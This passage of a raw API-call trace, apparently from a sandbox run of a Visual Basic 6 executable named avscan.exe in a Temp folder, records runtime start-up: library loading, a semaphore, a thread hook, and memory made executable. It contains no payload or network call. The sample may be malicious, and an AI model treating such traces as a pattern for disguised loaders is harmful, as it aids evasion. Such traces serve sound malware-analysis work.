returned="EN" [0164.929] lstrlenA (lpString="{xx}") returned 4 [0164.929] lstrlenA (lpString="VBENLR98.CHM") returned 12 [0164.929] lstrcpyA (in: lpString1=0x72a4ebf0, lpString2="VBENLR98.CHM" | out: lpString1="VBENLR98.CHM") returned="VBENLR98.CHM" [0164.929] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28fcc8, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0164.929] GetModuleFileNameA (in: hModule=0x72940000, lpFilename=0x28fbc4, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\MSVBVM60.DLL" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll")) returned 0x20 [0164.929] lstrcpynA (in: lpString1=0x28faa8, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL", iMaxLength=260 | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0164.929] lstrlenA (lpString="C:\\Windows\\system32\\MSVBVM60.DLL") returned 32 [0164.929] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x21) returned 0x2c717b0 [0164.929] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x21) returned 0x2c717e0 [0164.929] lstrcpyA (in: lpString1=0x2c717b0, lpString2="C:\\Windows\\system32\\MSVBVM60.DLL" | out: lpString1="C:\\Windows\\system32\\MSVBVM60.DLL") returned="C:\\Windows\\system32\\MSVBVM60.DLL" [0164.930] LCMapStringA (in: Locale=0x409, dwMapFlags=0x200, lpSrcStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", cchSrc=-1, lpDestStr=0x28fa88, cchDest=260 | out: lpDestStr="C:\\USERS\\KEECFM~1\\APPDATA\\LOCAL\\TEMP\\AVSCAN.EXE") returned 48 [0164.933] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x28fb8c, dwRevision=0x1 | out: pSecurityDescriptor=0x28fb8c) returned 1 [0164.933] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x28fb8c, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x28fb8c) returned 1 [0164.933] CreateSemaphoreA (lpSemaphoreAttributes=0x28fba0, lInitialCount=0, lMaximumCount=2147483647, lpName="C:?USERS?KEECFM~1?APPDATA?LOCAL?TEMP?AVSCAN.EXE") returned 0x11c [0164.933] GetLastError () returned 0xb7 [0164.933] GetVersionExA (in: lpVersionInformation=0x28fb04*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28fb04*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0164.933] OleInitialize (pvReserved=0x0) returned 0x0 [0164.943] OaBuildVersion () returned 0x321396 [0164.943] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="OLEAUT32.DLL", cbMultiByte=12, lpWideCharStr=0x28eb2c, cchWideChar=2047 | out: lpWideCharStr="OLEAUT32.DLLú") returned 12 [0164.944] SysReAllocStringLen (in: pbstr=0x28fb30*=0x0, psz="OLEAUT32.DLL", len=0xc | out: pbstr=0x28fb30*="OLEAUT32.DLL") returned 1 [0164.944] CharLowerBuffW (in: lpsz="OLEAUT32.DLL", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0164.944] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x775d0000 [0164.944] GetLastError () returned 0x0 [0164.945] SetLastError (dwErrCode=0x0) [0164.945] GetLastError () returned 0x0 [0164.945] GetProcAddress (hModule=0x775d0000, lpProcName="OleLoadPictureEx") returned 0x776370a1 [0164.945] RegisterClipboardFormatA (lpszFormat="Link") returned 0xc079 [0164.945] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc0b4 [0164.945] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBFocusRT6", lpWndClass=0x28fb6c | out: lpWndClass=0x28fb6c) returned 0 [0164.946] RegisterClassA (lpWndClass=0x28fb6c) returned 0x4ac1bf [0164.946] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBBubbleRT6", lpWndClass=0x28fb6c | out: lpWndClass=0x28fb6c) returned 0 [0164.946] RegisterClassA (lpWndClass=0x28fb6c) returned 0x4ac1c0 [0164.946] HeapCreate (flOptions=0x0, dwInitialSize=0x400, dwMaximumSize=0x0) returned 0x3fc0000 [0164.947] GetUserDefaultLCID () returned 0x409 [0164.947] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x3a4) returned 0x2c71810 [0164.947] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x3a4) returned 0x2c71bc0 [0164.947] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0xd4) returned 0x2c71f70 [0164.948] GetSystemInfo (in: lpSystemInfo=0x28fb2c | out: lpSystemInfo=0x28fb2c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x6a06)) [0164.948] VirtualAlloc (lpAddress=0x0, dwSize=0x10000, flAllocationType=0x2000, flProtect=0x4) returned 0x3e0000 [0164.948] VirtualAlloc (lpAddress=0x3e0000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0164.949] VirtualAlloc (lpAddress=0x3e0000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0164.949] VirtualAlloc (lpAddress=0x3e0000, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0164.950] VirtualAlloc (lpAddress=0x3e0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0164.950] VirtualAlloc (lpAddress=0x3e0000, dwSize=0x5000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0164.950] VirtualAlloc (lpAddress=0x3e0000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e0000 [0164.951] VirtualProtect (in: lpAddress=0x3e0000, dwSize=0x6000, flNewProtect=0x20, lpflOldProtect=0x28fb88 | out: lpflOldProtect=0x28fb88*=0x4) returned 1 [0164.951] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x3e0000, dwSize=0x6000) returned 1 [0164.951] GlobalAddAtomA (lpString="VBDisabled") returned 0xc164 [0164.952] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="oleaut32.dll", cbMultiByte=12, lpWideCharStr=0x28eae8, cchWideChar=2047 | out: lpWideCharStr="oleaut32.dll\x18") returned 12 [0164.952] SysReAllocStringLen (in: pbstr=0x28faec*=0x0, psz="oleaut32.dll", len=0xc | out: pbstr=0x28faec*="oleaut32.dll") returned 1 [0164.952] CharLowerBuffW (in: lpsz="oleaut32.dll", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0164.953] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x775d0000 [0164.953] GetProcAddress (hModule=0x775d0000, lpProcName="DispCallFunc") returned 0x775e3dcf [0164.954] GetProcAddress (hModule=0x775d0000, lpProcName="LoadTypeLibEx") returned 0x775e07b7 [0164.954] GetProcAddress (hModule=0x775d0000, lpProcName="UnRegisterTypeLib") returned 0x77601ca9 [0164.954] GetProcAddress (hModule=0x775d0000, lpProcName="CreateTypeLib2") returned 0x775e8e70 [0164.962] GetProcAddress (hModule=0x775d0000, lpProcName="VarDateFromUdate") returned 0x775e7684 [0164.962] GetProcAddress (hModule=0x775d0000, lpProcName="VarUdateFromDate") returned 0x775ecc98 [0164.963] GetProcAddress (hModule=0x775d0000, lpProcName="GetAltMonthNames") returned 0x7761903a [0164.963] GetProcAddress (hModule=0x775d0000, lpProcName="VarNumFromParseNum") returned 0x775e6231 [0164.963] GetProcAddress (hModule=0x775d0000, lpProcName="VarParseNumFromStr") returned 0x775e5fea [0164.964] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromR4") returned 0x775f3f94 [0164.964] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromR8") returned 0x775f4e9e [0164.964] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromDate") returned 0x7761db72 [0164.965] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromI4") returned 0x77602a8c [0164.965] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecFromCy") returned 0x7761d737 [0164.965] GetProcAddress (hModule=0x775d0000, lpProcName="VarR4FromDec") returned 0x7761e015 [0164.966] GetProcAddress (hModule=0x775d0000, lpProcName="GetRecordInfoFromTypeInfo") returned 0x7761cc3d [0164.966] GetProcAddress (hModule=0x775d0000, lpProcName="GetRecordInfoFromGuids") returned 0x7761d1c4 [0164.966] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayGetRecordInfo") returned 0x7761d48c [0164.967] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArraySetRecordInfo") returned 0x7761d4c6 [0164.967] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayGetIID") returned 0x7761d509 [0164.967] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArraySetIID") returned 0x775ee7bb [0164.968] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayCopyData") returned 0x775ee496 [0164.968] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayAllocDescriptorEx") returned 0x775eddf1 [0164.968] GetProcAddress (hModule=0x775d0000, lpProcName="SafeArrayCreateEx") returned 0x7761d53f [0164.969] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormat") returned 0x77622055 [0164.969] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormatDateTime") returned 0x776220ea [0164.969] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormatNumber") returned 0x77622151 [0164.970] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormatPercent") returned 0x776221f5 [0164.975] GetProcAddress (hModule=0x775d0000, lpProcName="VarFormatCurrency") returned 0x77622288 [0164.976] GetProcAddress (hModule=0x775d0000, lpProcName="VarWeekdayName") returned 0x77622335 [0164.976] GetProcAddress (hModule=0x775d0000, lpProcName="VarMonthName") returned 0x776223d5 [0164.976] GetProcAddress (hModule=0x775d0000, lpProcName="VarAdd") returned 0x775f5934 [0164.977] GetProcAddress (hModule=0x775d0000, lpProcName="VarAnd") returned 0x775f5a98 [0164.977] GetProcAddress (hModule=0x775d0000, lpProcName="VarCat") returned 0x775f59b4 [0164.977] GetProcAddress (hModule=0x775d0000, lpProcName="VarDiv") returned 0x7764e405 [0164.978] GetProcAddress (hModule=0x775d0000, lpProcName="VarEqv") returned 0x7764ef07 [0164.978] GetProcAddress (hModule=0x775d0000, lpProcName="VarIdiv") returned 0x7764f00a [0164.978] GetProcAddress (hModule=0x775d0000, lpProcName="VarImp") returned 0x7764ef47 [0164.979] GetProcAddress (hModule=0x775d0000, lpProcName="VarMod") returned 0x7764f15e [0164.979] GetProcAddress (hModule=0x775d0000, lpProcName="VarMul") returned 0x7764dbd4 [0164.980] GetProcAddress (hModule=0x775d0000, lpProcName="VarOr") returned 0x7764ecfa [0164.980] GetProcAddress (hModule=0x775d0000, lpProcName="VarPow") returned 0x7764ea66 [0164.980] GetProcAddress (hModule=0x775d0000, lpProcName="VarSub") returned 0x7764d332 [0164.981] GetProcAddress (hModule=0x775d0000, lpProcName="VarXor") returned 0x7764ee2e [0164.981] GetProcAddress (hModule=0x775d0000, lpProcName="VarAbs") returned 0x7764ca11 [0164.981] GetProcAddress (hModule=0x775d0000, lpProcName="VarFix") returned 0x7764cc5f [0164.982] GetProcAddress (hModule=0x775d0000, lpProcName="VarInt") returned 0x7764cde7 [0164.982] GetProcAddress (hModule=0x775d0000, lpProcName="VarNeg") returned 0x7764c802 [0164.982] GetProcAddress (hModule=0x775d0000, lpProcName="VarNot") returned 0x7764ec66 [0164.983] GetProcAddress (hModule=0x775d0000, lpProcName="VarRound") returned 0x7764d155 [0164.983] GetProcAddress (hModule=0x775d0000, lpProcName="VarCmp") returned 0x775eb0dc [0164.983] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecAdd") returned 0x77605f3e [0164.984] GetProcAddress (hModule=0x775d0000, lpProcName="VarDecCmp") returned 0x775f4fd0 [0164.984] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrCat") returned 0x775f0d2c [0164.985] GetProcAddress (hModule=0x775d0000, lpProcName="VarCyMulI4") returned 0x776059ed [0164.985] GetProcAddress (hModule=0x775d0000, lpProcName="VarBstrCmp") returned 0x775df8b8 [0164.985] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="ole32.dll", cbMultiByte=9, lpWideCharStr=0x28eaf4, cchWideChar=2047 | out: lpWideCharStr="ole32.dll(\x0c") returned 9 [0164.990] SysReAllocStringLen (in: pbstr=0x28faf8*=0x0, psz="ole32.dll", len=0x9 | out: pbstr=0x28faf8*="ole32.dll") returned 1 [0164.990] CharLowerBuffW (in: lpsz="ole32.dll", cchLength=0x9 | out: lpsz="ole32.dll") returned 0x9 [0164.990] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76c60000 [0164.991] GetProcAddress (hModule=0x76c60000, lpProcName="CoCreateInstanceEx") returned 0x76ca9d4e [0164.991] GetProcAddress (hModule=0x76c60000, lpProcName="CLSIDFromProgIDEx") returned 0x76c70782 [0164.991] GetSystemMetrics (nIndex=42) returned 0 [0164.992] CoGetMalloc (in: dwMemContext=0x1, ppMalloc=0x72a4e688 | out: ppMalloc=0x72a4e688*=0x76da66bc) returned 0x0 [0164.992] IMalloc:Alloc (This=0x76da66bc, cb=0x4) returned 0x108b370 [0164.992] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f8a0, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0164.992] lstrcatA (in: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpString2=".cfg" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe.cfg") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe.cfg" [0164.992] SetLastError (dwErrCode=0x0) [0164.992] SearchPathA (in: lpPath=0x0, lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe.cfg", lpExtension=0x0, nBufferLength=0x103, lpBuffer=0x28f79c, lpFilePart=0x28f770 | out: lpBuffer="´ù(", lpFilePart=0x28f770) returned 0x0 [0164.993] SetLastError (dwErrCode=0x2) [0164.993] GetLastError () returned 0x2 [0164.993] lstrcmpiA (lpString1="avscan", lpString2="MTX") returned -1 [0164.993] lstrcmpiA (lpString1="avscan", lpString2="DLLHOST") returned -1 [0164.993] lstrcmpiA (lpString1="avscan", lpString2="INETINFO") returned -1 [0164.993] lstrcmpiA (lpString1="avscan", lpString2="W3WP") returned -1 [0164.993] lstrcmpiA (lpString1="avscan", lpString2="ASPNET_WP") returned 1 [0164.993] lstrcmpiA (lpString1="avscan", lpString2="DLLHST3G") returned -1 [0164.993] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f894, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0164.993] lstrcmpiA (lpString1="avscan", lpString2="IEXPLORE") returned -1 [0164.994] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="SXS.DLL", cbMultiByte=7, lpWideCharStr=0x28eb30, cchWideChar=2047 | out: lpWideCharStr="SXS.DLLDLLú") returned 7 [0164.994] SysReAllocStringLen (in: pbstr=0x28fb34*=0x0, psz="SXS.DLL", len=0x7 | out: pbstr=0x28fb34*="SXS.DLL") returned 1 [0164.994] CharLowerBuffW (in: lpsz="SXS.DLL", cchLength=0x7 | out: lpsz="sxs.dll") returned 0x7 [0164.994] LoadLibraryA (lpLibFileName="SXS.DLL") returned 0x72ec0000 [0165.003] GetLastError () returned 0x0 [0165.004] SetLastError (dwErrCode=0x0) [0165.004] GetLastError () returned 0x0 [0165.004] GetProcAddress (hModule=0x72ec0000, lpProcName="SxsOleAut32MapIIDOrCLSIDToTypeLibrary") returned 0x72f07685 [0165.004] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="", cbMultiByte=-1, lpWideCharStr=0x28fde0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0165.004] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x1c) returned 0x2c72050 [0165.005] CoRegisterMessageFilter (in: lpMessageFilter=0x2c72054, lplpMessageFilter=0x2c7205c | out: lplpMessageFilter=0x2c7205c*=0x0) returned 0x0 [0165.005] IUnknown:AddRef (This=0x2c72054) returned 0x2 [0165.005] GetClassInfoExA (in: hInstance=0x72940000, lpszClass="ThunderRT6Main", lpwcx=0x28fdb0 | out: lpwcx=0x28fdb0) returned 0 [0165.006] LoadIconA (hInstance=0x400000, lpIconName=0x1) returned 0x302b3 [0165.007] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="USER32", cbMultiByte=6, lpWideCharStr=0x28ed48, cchWideChar=2047 | out: lpWideCharStr="USER32೴ĉ㇀ćؘU\x1c") returned 6 [0165.007] SysReAllocStringLen (in: pbstr=0x28fd4c*=0x0, psz="USER32", len=0x6 | out: pbstr=0x28fd4c*="USER32") returned 1 [0165.007] CharLowerBuffW (in: lpsz="USER32", cchLength=0x6 | out: lpsz="user32") returned 0x6 [0165.008] GetModuleHandleA (lpModuleName="USER32") returned 0x75980000 [0165.008] GetProcAddress (hModule=0x75980000, lpProcName="GetSystemMetrics") returned 0x75997d2f [0165.009] GetProcAddress (hModule=0x75980000, lpProcName="MonitorFromWindow") returned 0x759a3150 [0165.009] GetProcAddress (hModule=0x75980000, lpProcName="MonitorFromRect") returned 0x759be7a0 [0165.010] GetProcAddress (hModule=0x75980000, lpProcName="MonitorFromPoint") returned 0x759a5281 [0165.010] GetProcAddress (hModule=0x75980000, lpProcName="EnumDisplayMonitors") returned 0x759a451a [0165.010] GetProcAddress (hModule=0x75980000, lpProcName="GetMonitorInfoA") returned 0x759a4413 [0165.010] GetSystemMetrics (nIndex=0) returned 1440 [0165.010] GetSystemMetrics (nIndex=78) returned 1440 [0165.011] GetSystemMetrics (nIndex=1) returned 900 [0165.011] GetSystemMetrics (nIndex=79) returned 900 [0165.011] GetSystemMetrics (nIndex=50) returned 16 [0165.011] GetSystemMetrics (nIndex=49) returned 16 [0165.011] LoadImageA (hInst=0x400000, name=0x1, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x4014d [0165.012] RegisterClassExA (param_1=0x28fdb0) returned 0x11c1c2 [0165.012] CreateWindowExA (dwExStyle=0x80, lpClassName="ThunderRT6Main", lpWindowName=0x0, dwStyle=0x80090000, X=-2147483648, Y=-2147483648, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x103de [0165.013] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0x81, wParam=0x0, lParam=0x28f994) returned 0x1 [0165.023] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0x83, wParam=0x0, lParam=0x28f980) returned 0x0 [0165.023] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0x1, wParam=0x0, lParam=0x28f994) returned 0x0 [0165.023] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0165.023] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0165.024] MonitorFromWindow (hwnd=0x103de, dwFlags=0x2) returned 0x10001 [0165.024] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x28fdb8 | out: lpmi=0x28fdb8) returned 1 [0165.024] SetWindowPos (hWnd=0x103de, hWndInsertAfter=0x0, X=720, Y=450, cx=0, cy=0, uFlags=0x1d) returned 1 [0165.024] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0x46, wParam=0x0, lParam=0x28fd58) returned 0x0 [0165.026] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0x47, wParam=0x0, lParam=0x28fd58) returned 0x0 [0165.026] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0x3, wParam=0x0, lParam=0x1c202d0) returned 0x0 [0165.026] ShowWindow (hWnd=0x103de, nCmdShow=4) returned 0 [0165.026] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0165.027] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0x46, wParam=0x0, lParam=0x28fd6c) returned 0x0 [0165.028] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0x47, wParam=0x0, lParam=0x28fd6c) returned 0x0 [0165.029] GetWindowThreadProcessId (in: hWnd=0x103de, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xba4 [0165.029] VirtualQuery (in: lpAddress=0x28fde0, lpBuffer=0x28fdc4, dwLength=0x1c | out: lpBuffer=0x28fdc4*(BaseAddress=0x28f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0165.029] GetUserDefaultLCID () returned 0x409 [0165.029] IsValidCodePage (CodePage=0x3a4) returned 1 [0165.030] IsValidCodePage (CodePage=0x3b5) returned 1 [0165.030] IsValidCodePage (CodePage=0x3b6) returned 1 [0165.030] IsValidCodePage (CodePage=0x3a8) returned 1 [0165.042] GetUserDefaultLangID () returned 0x409 [0165.042] GetSystemDefaultLangID () returned 0x1080409 [0165.042] GetSystemMetrics (nIndex=42) returned 0 [0165.042] IMalloc:Alloc (This=0x76da66bc, cb=0xa8) returned 0x1098c68 [0165.042] IMalloc:GetSize (This=0x76da66bc, pv=0x1098c68) returned 0xa8 [0165.043] IMalloc:Alloc (This=0x76da66bc, cb=0xc) returned 0x108eb70 [0165.043] GetCurrentThreadId () returned 0xba4 [0165.043] IMalloc:Alloc (This=0x76da66bc, cb=0x3c) returned 0x1086f00 [0165.043] IMalloc:Alloc (This=0x76da66bc, cb=0x1c) returned 0x1099108 [0165.044] RegOpenKeyA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\VBA\\Monitors", phkResult=0x28fdac | out: phkResult=0x28fdac*=0x0) returned 0x2 [0165.044] IMalloc:Alloc (This=0x76da66bc, cb=0x1c) returned 0x1099130 [0165.044] GetCurrentThreadId () returned 0xba4 [0165.044] SetWindowsHookExA (idHook=-1, lpfn=0x729a1e09, hmod=0x0, dwThreadId=0xba4) returned 0x2014f [0165.044] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x14) returned 0x2c72078 [0165.044] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x80) returned 0x2c72098 [0165.045] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x10) returned 0x2c72120 [0165.045] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x2c) returned 0x2c72138 [0165.045] GetClassInfoA (in: hInstance=0x72940000, lpClassName="VBMsoStdCompMgr", lpWndClass=0x28fd04 | out: lpWndClass=0x28fd04) returned 0 [0165.045] RegisterClassA (lpWndClass=0x28fd04) returned 0x1bc1c3 [0165.045] CreateWindowExA (dwExStyle=0x0, lpClassName="VBMsoStdCompMgr", lpWindowName=0x0, dwStyle=0x80000000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x103e2 [0165.045] NtdllDefWindowProc_A (hWnd=0x103e2, Msg=0x81, wParam=0x0, lParam=0x28f940) returned 0x1 [0165.046] NtdllDefWindowProc_A (hWnd=0x103e2, Msg=0x83, wParam=0x0, lParam=0x28f92c) returned 0x0 [0165.046] NtdllDefWindowProc_A (hWnd=0x103e2, Msg=0x1, wParam=0x0, lParam=0x28f940) returned 0x0 [0165.046] NtdllDefWindowProc_A (hWnd=0x103e2, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0165.046] NtdllDefWindowProc_A (hWnd=0x103e2, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0165.047] SetWindowLongA (hWnd=0x103e2, nIndex=0, dwNewLong=46604444) returned 0 [0165.047] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x38) returned 0x2c72170 [0165.047] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x18) returned 0x2c721b0 [0165.047] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x10) returned 0x2c721d0 [0165.047] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0165.047] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0165.047] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0165.047] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0165.048] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0165.048] RegisterClipboardFormatA (lpszFormat="OwnerLink") returned 0xc003 [0165.048] RegisterClipboardFormatA (lpszFormat="FileName") returned 0xc006 [0165.052] CreateCompatibleDC (hdc=0x0) returned 0x12010c4c [0165.052] GetCurrentObject (hdc=0x12010c4c, type=0x7) returned 0x185000f [0165.052] CreateWindowExA (dwExStyle=0x0, lpClassName="VBFocusRT6", lpWindowName=0x0, dwStyle=0x40000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x103de, hMenu=0x0, hInstance=0x72940000, lpParam=0x0) returned 0x103e4 [0165.052] NtdllDefWindowProc_A (hWnd=0x103e4, Msg=0x81, wParam=0x0, lParam=0x28f9d0) returned 0x1 [0165.053] NtdllDefWindowProc_A (hWnd=0x103e4, Msg=0x83, wParam=0x0, lParam=0x28f9bc) returned 0x0 [0165.053] NtdllDefWindowProc_A (hWnd=0x103e4, Msg=0x1, wParam=0x0, lParam=0x28f9d0) returned 0x0 [0165.053] NtdllDefWindowProc_A (hWnd=0x103e4, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0165.054] NtdllDefWindowProc_A (hWnd=0x103e4, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0165.054] NtdllDefWindowProc_A (hWnd=0x103de, Msg=0x210, wParam=0x1, lParam=0x103e4) returned 0x0 [0165.054] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x18) returned 0x2c721e8 [0165.054] RtlAllocateHeap (HeapHandle=0x3fc0000, Flags=0x8, Size=0x114) returned 0x3fc07d0 [0165.054] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x5c) returned 0x2c72208 [0165.054] GetCurrentThreadId () returned 0xba4 [0165.054] GetCurrentThreadId () returned 0xba4 [0165.055] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x10) returned 0x2c72270 [0165.055] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x30) returned 0x2c72288 [0165.055] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x434) returned 0x2c722c0 [0165.055] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x434) returned 0x2c72700 [0165.055] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x3c) returned 0x2c72b40 [0165.055] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c72b88 [0165.055] lstrlenA (lpString="VB") returned 2 [0165.055] lstrlenA (lpString="PictureBox") returned 10 [0165.056] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0xe) returned 0x2c72ca8 [0165.056] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x16c) returned 0x2c72cc0 [0165.056] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x68) returned 0x2c72e38 [0165.057] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x2c8) returned 0x2c72ea8 [0165.057] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x28) returned 0x2c73178 [0165.057] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x15) returned 0x2c731a8 [0165.058] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0x28) returned 0x2c731c8 [0165.058] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x114) returned 0x2c731f8 [0165.058] lstrlenA (lpString="VB") returned 2 [0165.058] lstrlenA (lpString="TextBox") returned 7 [0165.058] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x0, Size=0xb) returned 0x2c73318 [0165.058] RtlAllocateHeap (HeapHandle=0x2c70000, Flags=0x8, Size=0x38) returned 0x2c73330 [0165.058] 